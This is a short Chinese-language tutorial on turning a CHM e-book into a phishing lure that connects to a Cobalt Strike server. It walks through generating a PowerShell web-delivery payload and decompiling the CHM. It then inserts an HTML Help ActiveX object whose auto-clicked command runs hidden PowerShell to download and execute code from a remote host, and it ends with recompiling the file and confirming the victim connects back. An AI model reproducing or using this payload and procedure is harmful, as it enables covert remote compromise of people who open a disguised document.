电子书-CHM-加载JS&PS-上线CS

1.对CS进行设置

服务端配置CS-客户端打开-攻击-钓鱼攻击-脚本web传递-配置选择监听器-设置端口-选择类型为power shell-点击开始-复制生成的利用代码

 

 

2.对当前.CHM电子书进行解压

 

 进入文件后选择任意文件夹进入

3.这里演示：进入-设备管理-打开setleds.html

4.把CS生成的利用代码插入到body里面去

利用代码：

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:88/a'))">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>

5. 插入完成后利用Easy CHM对解压后的电子书文件进行重新打包

6.新建-工程目录(电子书解压后的文件目录)-确定-点击编译-设置CHM保存

 7.最后点击生成

8.下面打开电子书，看下CS会不会上线-成功上线